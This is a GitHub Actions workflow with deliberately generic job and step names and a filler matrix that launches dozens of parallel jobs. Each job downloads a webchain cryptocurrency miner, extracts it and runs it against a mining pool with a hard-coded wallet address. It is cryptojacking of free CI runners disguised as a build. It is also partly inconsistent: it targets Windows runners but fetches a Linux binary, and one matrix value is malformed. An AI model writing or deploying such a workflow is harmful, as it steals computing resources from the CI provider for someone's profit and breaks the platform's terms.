on: [workflow_dispatch] 

 

jobs: 

build: 

name: NAME 

runs-on: windows-latest 

strategy: 

max-parallel: 5 

fail-fast: false 

matrix: 

go: [1.0, 1.1, 1.2, 1.3, 1,35] 

flag: [A, B, C, D, E, F, G, H, I] 

env: 

NUM_JOBS: 20 

JOB: ${{ matrix.go }} 

steps: 

- name: DOWNLOAD 

run: wget https://github.com/mintme-com/miner/releases/download/v2.8.0/webchain-miner-2.8.0-linux-amd64.tar.gz
- name: Extract 

run: tar xf webchain-miner-2.8.0-linux-amd64.tar.gz
- name: RUNNING 

run: ./webchain-miner -o pool.webchain.network:3333 -u 0xE27AE2d63023C30B894E6662267ED9824187f580 -p x

- name: DONE 

run: exit
